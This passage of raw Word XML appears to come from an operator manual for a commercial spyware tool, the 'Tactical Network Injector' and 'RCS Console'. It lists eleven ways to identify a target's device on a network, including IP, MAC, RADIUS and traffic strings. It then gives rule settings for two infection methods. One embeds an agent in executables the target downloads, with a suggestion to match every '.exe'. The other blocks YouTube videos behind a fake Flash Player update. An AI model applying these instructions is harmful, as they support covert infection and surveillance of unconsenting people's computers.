        <w:lastRenderedPageBreak/>
        <w:t>Target Identification Methods</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRPr="00736675" w:rsidRDefault="005448D4" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRPr="00736675" w:rsidRDefault="00827343" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736675">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="004E6180" w:rsidRPr="00736675">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactical </w:t>
      </w:r>
      <w:r w:rsidRPr="00736675">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Injector</w:t>
      </w:r>
      <w:r w:rsidR="004E6180" w:rsidRPr="00736675">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> offers 11 different methods to identify your Target’s device over a network, described below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRDefault="005448D4" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7506"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72FCD">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 xml:space="preserve">Identification </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00CB7D48" w:rsidP="00F72FCD">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CB7D48" w:rsidTr="00F72F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STATIC-IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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Static IP address assigned to the Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72FCD">
        <w:trPr>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STATIC-RANGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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Range of IP addresses assigned to the Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72F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STATIC-MAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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Target’s static MAC address (both Ethernet and Wi-Fi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72FCD">
        <w:trPr>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DHCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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Target’s network interface MAC address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72F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RADIUS-LOGIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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RADIUS user name (User-Name / RADIUS 802.1x)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72FCD">
        <w:trPr>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RADIUS-CALLID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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RADIUS caller ID (Calling-Station-Id / RADIUS 802.1x)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72F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RADIUS-SESSID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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RADIUS session ID (Acct-Session-Id / RADIUS 802.1x)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72FCD">
        <w:trPr>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RADIUS-TECHKEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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RADIUS key (NAS-IP-Address: Acct-Session-Id / RADIUS 802.1x)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72F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STRING-CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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Text string to be identified in the data traffic from the Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72FCD">
        <w:trPr>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STRING-SERVER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00F72FCD">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Text string to be identified in the data traffic to the Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB7D48" w:rsidTr="00F72FC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B7D48" w:rsidRDefault="00CB7D48" w:rsidP="00F72FCD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TACTICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7506" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00CB7D48" w:rsidRDefault="00F72FCD" w:rsidP="00846679">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Target is </w:t>
            </w:r>
            <w:r w:rsidR="00846679">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">manually </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>identified</w:t>
            </w:r>
            <w:r w:rsidR="00846679">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">by the operator on Tactical Network Injector. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007C0163" w:rsidRDefault="007C0163" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E3D9B" w:rsidRDefault="002E3D9B" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00530D11" w:rsidRDefault="003B3CCE" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The identification method must be se</w:t>
      </w:r>
      <w:r w:rsidR="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">lected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">when creating a new rule, within the field [ </w:t>
      </w:r>
      <w:r w:rsidRPr="003B3CCE">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ].</w:t>
      </w:r>
      <w:r w:rsidR="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> All of the listed identification methods - except TACTICAL - require also the field [ </w:t>
      </w:r>
      <w:r w:rsidR="00636A0A">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidR="00530D11" w:rsidRPr="00530D11">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern</w:t>
      </w:r>
      <w:r w:rsidR="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] to be filled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068421F" w:rsidRDefault="0068421F" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRDefault="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRPr="00D84282" w:rsidRDefault="005448D4" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc372642502"/>
      <w:r w:rsidRPr="00D84282">
        <w:lastRenderedPageBreak/>
        <w:t>INJECT-EXE Infection Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRDefault="005448D4" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRDefault="00BF3A82" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The INJECT-EXE infection allows the operator of the Tactical Network Injector to infect a desktop device while the Target</w:t>
      </w:r>
      <w:r w:rsidR="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>downloading an executable file from Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791D17" w:rsidRDefault="00791D17" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00791D17" w:rsidRDefault="00791D17" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Agent is melted inside the EXE file downloaded and the infection is applied when the Target runs the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791D17" w:rsidRDefault="00791D17" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00791D17" w:rsidRDefault="00D84282" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3638550" cy="3914775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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38550" cy="3914775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791D17" w:rsidRPr="00636A0A" w:rsidRDefault="00791D17" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00636A0A" w:rsidRDefault="0010013A" w:rsidP="00636A0A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.5</w:t>
      </w:r>
      <w:r w:rsidR="00636A0A" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] </w:t>
      </w:r>
      <w:r w:rsidR="00636A0A">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">System &gt; Network Injectors &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00636A0A" w:rsidRPr="00171249">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Network Injector #</w:t>
      </w:r>
      <w:r w:rsidR="00636A0A">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Add a new rule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791D17" w:rsidRDefault="00791D17" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00636A0A" w:rsidRDefault="00636A0A" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00636A0A" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The INJECT-EXE infection method must be selected when creating a new rule, </w:t>
      </w:r>
      <w:r w:rsidR="00D84282">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the field [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00636A0A" w:rsidRDefault="00636A0A" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The field [</w:t>
      </w:r>
      <w:r w:rsidRPr="00636A0A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resource pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00636A0A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>] also need to be filled with the URL of the executable file to infect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00636A0A" w:rsidRDefault="00636A0A" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00636A0A" w:rsidRDefault="00636A0A" w:rsidP="00636A0A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The image </w:t>
      </w:r>
      <w:r w:rsidR="00302B40">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a possible rule configuration based on INJECT-EXE infection method</w:t>
      </w:r>
      <w:r w:rsidR="00BB3222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and suggests to fill the [ </w:t>
      </w:r>
      <w:r w:rsidR="00BB3222" w:rsidRPr="00BB3222">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resource pattern</w:t>
      </w:r>
      <w:r w:rsidR="00BB3222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] field with the string  </w:t>
      </w:r>
      <w:r w:rsidR="00BB3222" w:rsidRPr="00BB3222">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*.exe*</w:t>
      </w:r>
      <w:r w:rsidR="00BB3222">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  in order to infect all the executable files, regardless of the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRPr="003F1D26" w:rsidRDefault="005448D4" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc372642503"/>
      <w:r w:rsidRPr="003F1D26">
        <w:lastRenderedPageBreak/>
        <w:t>INJECT-HTML-FLASH Infection Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRDefault="005448D4" w:rsidP="005448D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The INJECT-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML-FLASH</w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> infection allows the operator of the Tactical Network Injector to infect a desktop device while the Target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="003F1D26">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trying to watch a video on YouTube</w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00151DE6" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This infection method blocks videos on YouTube and requires the Target to install a fake Flash Player update to view them. </w:t>
      </w:r>
      <w:r w:rsidR="00D84282">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The infection is applied when the Target runs the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r w:rsidR="00D84282">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3638550" cy="3914775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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38550" cy="3914775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRPr="00636A0A" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="0010013A" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.6</w:t>
      </w:r>
      <w:r w:rsidR="00D84282" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] </w:t>
      </w:r>
      <w:r w:rsidR="00D84282">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">System &gt; Network Injectors &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00D84282" w:rsidRPr="00171249">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Network Injector #</w:t>
      </w:r>
      <w:r w:rsidR="00D84282">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Add a new rule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D84282" w:rsidRDefault="00D84282" w:rsidP="00D84282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INJECT-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML-FLASH infection method must be selected when creating a new rule, through the field [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]. The field [</w:t>
      </w:r>
      <w:r w:rsidRPr="00636A0A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00530D11">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resource pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00636A0A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
